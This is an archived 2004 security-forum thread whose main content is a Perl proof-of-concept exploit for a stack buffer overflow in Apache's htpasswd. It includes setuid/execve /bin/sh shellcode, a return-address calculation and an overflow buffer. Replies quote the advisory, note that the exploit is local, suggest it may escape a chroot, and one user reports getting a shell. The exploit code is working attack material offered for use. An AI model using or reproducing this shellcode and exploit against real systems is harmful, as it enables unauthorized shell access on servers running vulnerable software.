hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
ShouiZen
Sep 18 2004, 01:47 AM
CODE

#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - foxtrot_at_flowsecurity.org
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);


print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";


local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;


exec("$target -nb $buffer");

setthesun
Sep 18 2004, 12:06 PM
This is a local exploit, Right?
Gotisch
Sep 18 2004, 12:39 PM
QUOTE

[01] Package Description
[02] The problem
[03] Possibilities
[04] Solution
[05] Proof of Concept
[06] Credits


[01] Short Description

Since htpasswd is part of apache software, here we got the apache description.
Apache has been the most popular web server on the Internet since
April of 1996. The October 2003 Netcraft Web Server Survey found that
more than 64% of the web sites on the Internet are using Apache, thus
making it more widely used than all other web servers combined.

[02] The problem

In apache/src/support/htpasswd.c were found lots of problems with strcpy.
Unchecked buffers with user and passwd variables may let an attacker
to take advantage of it.


[03] Possibilities

htpasswd is not setuid root by default. And it doesn't have any sense to
do it yourself. So you can't gain root by exploiting these bugs directly.

However, you can get out from apache's chroot environment since
htpasswd usually stays in its environment.

[04] Solution

Take a good look in strcpy functions and maybe change it for strncpy function.


[05] Proof of Concep

see first post



yep local
gsicht
Sep 20 2004, 04:14 PM
i got a shell, but no root privilegs tongue.gif
Gotisch
Sep 20 2004, 08:32 PM
QUOTE
htpasswd is not setuid root by default. And it doesn't have any sense to
do it yourself. So you can't gain root by exploiting these bugs directly.

However, you can get out from apache's chroot environment since
htpasswd usually stays in its environment.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.